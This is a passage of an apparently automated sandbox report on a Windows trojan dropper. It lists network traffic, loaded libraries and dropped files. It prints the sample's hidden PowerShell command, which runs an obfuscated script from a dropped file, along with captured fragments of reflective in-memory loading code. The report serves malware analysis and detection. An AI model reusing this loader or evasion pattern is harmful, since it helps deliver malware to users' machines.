      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/roject.net
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/serv
      Source: Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/z
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
      Source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
      Source: Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.g
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
      Source: Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://translate.google.com/translate_a/elem
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49942 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.6:49948 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50005 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50009 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50019 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50021 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50025 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50031 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50035 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

      System Summary

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Autocueing.exeJump to dropped file
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00406DC60_2_00406DC6
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_0040759D0_2_0040759D
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
      Source: av8XPPpdBc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@2/2
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile created: C:\Users\user\AppData\Roaming\erstatningsgradenJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile created: C:\Users\user\AppData\Local\Temp\nsbE0C9.tmpJump to behavior
      Source: av8XPPpdBc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: av8XPPpdBc.exeVirustotal: Detection: 48%
      Source: av8XPPpdBc.exeReversingLabs: Detection: 62%
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile read: C:\Users\user\Desktop\av8XPPpdBc.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\av8XPPpdBc.exe "C:\Users\user\Desktop\av8XPPpdBc.exe"
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Autocueing.exe "C:\Users\user\AppData\Local\Temp\Autocueing.exe"
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: av8XPPpdBc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: e.pdbd< source: powershell.exe, 00000002.00000002.2527735231.00000000085DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000002.00000002.2527735231.00000000085DD000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: Yara matchFile source: 00000002.00000002.2530768595.00000000094D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.3393778928.0000000001764000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fontange93 $Swooping $Merritt), (Sultekosts @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Styled = [AppDomain]::CurrentDomain.GetAssemblies()$global:Conj
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Oplgninger)), $Enhedsfrontens).DefineDynamicModule($hypacusia, $false).DefineType($Erlan, $Afprvningsstrategiers, [System.MulticastDel
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0766B140 push ss; iretd 2_2_0766B144
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_076670DA push edi; iretd 2_2_076670DB
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0766B0A3 push cs; iretd 2_2_0766B0AA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093B29F9 push 8BD38B50h; iretd 2_2_093B29FE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093B20B2 pushfd ; ret 2_2_093B20BF
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile created: C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Autocueing.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
